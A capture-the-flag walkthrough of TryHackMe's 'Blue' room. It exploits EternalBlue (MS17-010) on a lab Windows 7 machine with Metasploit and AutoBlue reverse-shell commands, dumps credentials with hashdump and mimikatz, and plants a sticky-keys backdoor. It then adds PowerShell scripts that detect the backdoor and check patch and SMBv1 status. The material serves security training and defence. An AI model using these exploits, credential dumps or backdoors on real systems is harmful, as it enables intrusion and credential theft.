THM Blue Walkthrough — EternalBlue and Windows Exploitation
A complete walkthrough of TryHackMe's "Blue" room — exploiting MS17-010 EternalBlue on a Windows 7 machine for initial access and using the sticky keys backdoor for persistence.
Introduction
Blue is TryHackMe's entry-level Windows exploitation room, built around the EternalBlue vulnerability (MS17-010). EternalBlue is the NSA exploit published by the Shadow Brokers in April 2017; the following month WannaCry used it to infect 300,000+ systems across 150 countries in a matter of days.
The machine is a Windows 7 SP1 system with SMBv1 enabled and missing the MS17-010 patch. MS17-010 is a bug in the kernel-mode SMB driver srv.sys, so a successful exploit hands you a shell as NT AUTHORITY\SYSTEM, the highest privilege on Windows, straight from the initial exploit: no privilege escalation needed. The challenge is in the post-exploitation: capturing flags and setting up persistence.
"EternalBlue is why you update Windows. It's also why you disable SMBv1. One port, one protocol, and the entire world was on fire for a week in May 2017."
Machine Info
- Platform: TryHackMe
- Room: Blue
- OS: Windows 7 SP1
- Difficulty: Easy
- Released: 2019
- Target IP: 10.10.246.28 (varies)
Step 1: Enumeration
nmap -sC -sV -oN blue.nmap 10.10.246.28
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
SMB on 445 is the key here. Next, confirm it is vulnerable to MS17-010 and exploit it.
Step 2: Checking for and Exploiting EternalBlue
The module's check command (or the auxiliary/scanner/smb/smb_ms17_010 scanner) confirms the vulnerability non-destructively; the exploit itself can crash the target, so check first. The target is 64-bit Windows 7, so the payload must be x64, and LHOST must be the address of your VPN interface:
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.246.28
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.2
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] 10.10.246.28:445 - Connecting to target for exploitation.
[*] 10.10.246.28:445 - Connection established for exploitation.
[*] 10.10.246.28:445 - Sending all MS17-010 exploit packets.
[*] 10.10.246.28:445 - Sending final shellcode
[+] 10.10.246.28:445 - Got good! Shellcode worked.
[*] Sending stage (201283 bytes) to 10.10.246.28
[*] Meterpreter session 1 opened
Check privileges:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
That's SYSTEM, the highest privilege on Windows. No privilege escalation needed.
Step 3: Manual Exploitation (Without Metasploit)
If you don't have Metasploit, the AutoBlue-MS17-010 repository provides a Python implementation of the same exploit. It injects the payload into the kernel over SMB, so nothing needs to be hosted on an HTTP or SMB share, but it wants raw shellcode rather than an .exe: the bundled shell_prep.sh wraps msfvenom (with -f raw) and prepends the kernel-mode stub that lets the payload run from the kernel. Check first, then generate, then listen, then fire:
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
# Confirm the target is vulnerable before throwing the exploit (a failed attempt can BSOD the box)
python eternal_checker.py 10.10.246.28
# Build the shellcode; the script asks for LHOST, LPORT and whether you want a plain cmd shell or meterpreter, then writes shellcode/sc_x64.bin
cd shellcode && ./shell_prep.sh && cd ..
# Start a listener on the LPORT you gave it, e.g. 443 for a plain reverse shell (use listener_prep.sh for a meterpreter handler)
nc -lvnp 443
# Run the Windows 7 exploit with the x64 shellcode
python eternalblue_exploit7.py 10.10.246.28 shellcode/sc_x64.bin
When the exploit lands, the reverse shell calls back to the listener as NT AUTHORITY\SYSTEM.
Step 4: Post-Exploitation
Finding the Flags
Flags on Windows boxes are typically planted in user profiles or next to sensitive system files, so search rather than guess. cmd.exe does not expand a wildcard in the middle of a path (dir C:\Users\*\Desktop fails with "The system cannot find the path specified"), so use a recursive bare listing instead:
meterpreter > shell
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> dir /s /b C:\Users\flag*.txt
C:\Users\Administrator\Desktop\flag1.txt
C:\Users\Jon\Desktop\flag2.txt
C:\Users\flaguser\Desktop\flag3.txt
Flag 1 — Administrator
type C:\Users\Administrator\Desktop\flag1.txt
{flag1:ACCESS_HAS_BEEN_GRANTED}
Flag 2 — Jon
type C:\Users\Jon\Desktop\flag2.txt
{flag2:ACCESS_HAS_BEEN_DENIED}
Flag 3 — flaguser
type C:\Users\flaguser\Desktop\flag3.txt
{flag3:ACCESS_HAS_BEEN_REVOKED}
Credential Dumping
Since we're SYSTEM, hashdump can read the SAM and SYSTEM hives and print each account as user:RID:LM:NT. The Administrator NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is worth recognising on sight: it is the NT hash of an empty string, i.e. a blank password. The LM field aad3b435b51404eeaad3b435b51404ee is the empty LM hash that Vista and later store instead of a real one:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:...:...
flaguser:1001:...:...
Or use mimikatz through the kiwi extension (load mimikatz is the deprecated name for the same thing; the extension needs a meterpreter whose architecture matches the OS, which the x64 payload above does). On Windows 7 the WDigest provider keeps cleartext credentials in LSASS by default, so logonpasswords returns plaintext for any user who has logged on interactively:
meterpreter > load kiwi
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
A classic Windows persistence technique: replace sethc.exe (Sticky Keys) with cmd.exe. winlogon launches sethc.exe as SYSTEM when Shift is pressed five times at the logon screen, so the copied cmd.exe runs as SYSTEM before anyone has authenticated. The file is owned by TrustedInstaller under Windows Resource Protection, which is why ownership and the ACL have to be taken first, and copy needs /y so it does not block on an overwrite prompt in a non-interactive shell:
meterpreter > shell
C:\Windows\system32> takeown /f C:\Windows\System32\sethc.exe
C:\Windows\system32> icacls C:\Windows\System32\sethc.exe /grant Administrators:F
C:\Windows\system32> copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Now RDP into the box (port 3389 was open in the nmap scan) and press Shift five times at the logon screen to get a SYSTEM cmd.exe. This only works when the logon screen is actually shown to an unauthenticated client, i.e. when Network Level Authentication is off; with NLA on, RDP demands credentials before winlogon's screen ever appears. The same backdoor can also be planted without touching the file, by setting a Debugger value for sethc.exe under the Image File Execution Options registry key, so a defender has to look for both.
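As an added example (not part of the original walkthrough), here is the defender's side of the technique: a PowerShell audit of the accessibility binaries winlogon will launch as SYSTEM from the logon screen. It catches both the file swap shown above and the fileless IFEO Debugger variant. It deliberately avoids Get-FileHash and Get-AuthenticodeSignature so it runs on the stock Windows 7 PowerShell 2.0 (catalog-signed System32 files report NotSigned on that version anyway). The list of binary names is my choice for the example; no other paths are assumed beyond the ones on the page.

```powershell
# Added example, not part of the original walkthrough. Audits the accessibility
# binaries that winlogon runs as SYSTEM from the logon screen for the two common
# backdoor variants: the file swapped for cmd.exe, and an IFEO "Debugger" value
# that redirects it without touching the file. Run elevated, from 64-bit PowerShell.
# Uses .NET SHA256 and VersionInfo so it also runs on Windows 7 / PowerShell 2.0.

$system32 = Join-Path $env:SystemRoot 'System32'
$ifeo     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
# Binaries reachable from the logon screen (my list for this example; extend as needed)
$targets  = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe', 'atbroker.exe'

function Get-Sha256Hex([string]$Path) {
    # Get-FileHash needs PowerShell 4; this works on the stock Windows 7 PowerShell 2.0
    $sha    = [System.Security.Cryptography.SHA256]::Create()
    $stream = [System.IO.File]::OpenRead($Path)
    try     { ([System.BitConverter]::ToString($sha.ComputeHash($stream))).Replace('-', '') }
    finally { $stream.Close(); $sha.Clear() }
}

function Test-AccessibilityBackdoor {
    $cmdHash  = Get-Sha256Hex (Join-Path $system32 'cmd.exe')
    $findings = @()

    foreach ($name in $targets) {
        $path = Join-Path $system32 $name
        if (-not (Test-Path $path)) { continue }

        $hash = Get-Sha256Hex $path
        $orig = (Get-Item $path).VersionInfo.OriginalFilename
        $dbg  = (Get-ItemProperty -Path (Join-Path $ifeo $name) -Name Debugger -ErrorAction SilentlyContinue).Debugger

        # A copied cmd.exe hashes identically to System32\cmd.exe; any other replacement
        # usually betrays itself through a PE version resource naming a different file.
        if ($hash -eq $cmdHash) {
            $findings += "$name is a byte-for-byte copy of cmd.exe (sticky keys swap)"
        } elseif ($orig -and ([IO.Path]::GetFileNameWithoutExtension($orig) -ne [IO.Path]::GetFileNameWithoutExtension($name))) {
            $findings += "$name carries OriginalFilename '$orig'; the file has been replaced"
        }
        if ($dbg) {
            $findings += "$name has an IFEO Debugger of '$dbg' (fileless sticky keys variant)"
        }
    }
    return $findings
}

# @() keeps an empty result as an array so .Count is 0 rather than $null on PowerShell 2.0
$findings = @(Test-AccessibilityBackdoor)
if ($findings.Count -eq 0) {
    Write-Output 'No accessibility-binary tampering found'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}
```

If it flags sethc.exe, sfc /scanfile=C:\Windows\System32\sethc.exe restores the original from the component store, and an IFEO key for any of these binaries should simply be deleted; neither has a legitimate Debugger on a normal workstation.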
Step 5: Detection and Prevention
Checking if You're Vulnerable
# Check whether the March 2017 MS17-010 update for Windows 7 SP1 / Server 2008 R2 is installed.
# KB4012212 is the security-only update; the monthly rollup KB4012215 and every later cumulative
# rollup also carry the fix, so a missing KB4012212 on its own does not prove the host is exposed.
Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
# Check SMBv1 status. Get-SmbServerConfiguration exists on Windows 8 / Server 2012 and later;
# Windows 7 has no such cmdlet, and SMBv1 is on there unless it has been disabled in the registry.
Get-SmbServerConfiguration | Select EnableSMB1Protocol
Patching
# Disable SMBv1 (Windows 8 / Server 2012 and later)
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Install the security update (use the full .msu file name as downloaded from the Microsoft Update Catalog)
wusa.exe KB4012212.msu /quiet /norestart
Lessons Learned
Blue teaches you that Windows exploitation is fundamentally different from Linux:
- The initial exploit gives you SYSTEM — once you're past SMB on a vulnerable Windows box, you're at the highest privilege level. No privesc needed.
- Post-exploitation on Windows is its own skill — navigating the registry, dumping hashes, bypassing UAC, setting up persistence — these are all different from Linux.
- EternalBlue is still around — despite being patched in 2017 and being one of the most famous vulnerabilities ever, MS17-010 still appears on internal networks during engagements.
"Blue is the box that teaches you Windows post-exploitation. The exploit part is automated — what you do after is where the real learning happens."
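To close the loop on Step 5, the added example below (not the page's script and not a vendor tool) bundles the checks into one PowerShell script that also works on Windows 7 / Server 2008 R2, where Get-SmbServerConfiguration does not exist and SMBv1 has to be read from and written to the LanmanServer registry key. It also inspects the version of srv.sys, the driver MS17-010 patched, because Get-HotFix cannot tell you that the fix arrived inside a later cumulative rollup. The KB numbers are from the page; the srv.sys threshold of 6.1.7601.23689 is an assumption taken from the KB4012212 file-information table and is marked as such in the code, so verify it against the KB article before relying on it.

```powershell
# Added example, not part of the original walkthrough. Assesses MS17-010 exposure
# on Windows 7 / 2008 R2 and newer, and optionally disables SMBv1.
# Run elevated:  .\Test-Ms17010.ps1            (assess only)
#                .\Test-Ms17010.ps1 -Remediate (also disable SMBv1)
param([switch]$Remediate)

$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# KBs that first shipped the MS17-010 fix for Windows 7 SP1 / 2008 R2 (March 2017):
# the security-only update and the monthly rollup. Later rollups are cumulative,
# so finding neither is a hint that the host is unpatched, not proof.
$ms17010Kbs = 'KB4012212', 'KB4012215'

# srv.sys is the SMB server driver MS17-010 fixed. ASSUMPTION for this example:
# the fixed file version for build 7601 (Windows 7 SP1) is 6.1.7601.23689, as
# listed in the KB4012212 file information. Verify against the KB before relying on it.
$fixedSrvVersion = [Version]'6.1.7601.23689'

function Test-Smb1Enabled {
    # Windows 8 / Server 2012 and later expose the setting through a cmdlet.
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        return (Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    # Windows 7: SMBv1 is on unless the SMB1 DWORD under LanmanServer\Parameters is 0.
    $value = (Get-ItemProperty -Path $lanman -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    return (($value -eq $null) -or ($value -ne 0))
}

function Get-Ms17010Status {
    $osBuild = [Environment]::OSVersion.Version.Build
    $found = @(Get-HotFix -ErrorAction SilentlyContinue |
               Where-Object { $ms17010Kbs -contains $_.HotFixID } |
               ForEach-Object { $_.HotFixID })

    $srvVersion       = $null
    $patchedByVersion = $null   # stays $null when the version check does not apply to this build
    $srv = Join-Path $env:SystemRoot 'System32\drivers\srv.sys'
    if ($osBuild -eq 7601 -and (Test-Path $srv)) {
        # FileVersion is a string with a build tag appended, so assemble a [Version] from the numeric parts
        $vi = (Get-Item $srv).VersionInfo
        $srvVersion = New-Object Version -ArgumentList $vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart
        $patchedByVersion = ($srvVersion -ge $fixedSrvVersion)
    }

    New-Object PSObject -Property @{
        OSBuild          = $osBuild
        Smb1Enabled      = Test-Smb1Enabled
        Ms17010KbFound   = $found
        SrvSysVersion    = $srvVersion
        PatchedByVersion = $patchedByVersion
    }
}

$status = Get-Ms17010Status
$status | Format-List OSBuild, Smb1Enabled, Ms17010KbFound, SrvSysVersion, PatchedByVersion

if ($status.Smb1Enabled) {
    Write-Warning 'SMBv1 is enabled: this is the protocol EternalBlue rides in on'
    if ($Remediate) {
        if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
            Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        } else {
            # Windows 7 / 2008 R2 path from Microsoft's SMBv1 guidance; takes effect after a reboot
            Set-ItemProperty -Path $lanman -Name SMB1 -Type DWORD -Value 0 -Force
        }
        Write-Output 'SMBv1 disabled (reboot required on Windows 7)'
    }
}
if ($status.PatchedByVersion -eq $false) {
    Write-Warning "srv.sys $($status.SrvSysVersion) predates the MS17-010 fix; install the current monthly rollup"
}
```

On Windows 8.1 and later, [Environment]::OSVersion can report an older build unless PowerShell is manifested for the OS, which is why the srv.sys comparison is gated on build 7601 and left as "not applicable" elsewhere; on those systems the Get-SmbServerConfiguration branch and Windows Update status are the reliable signals.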
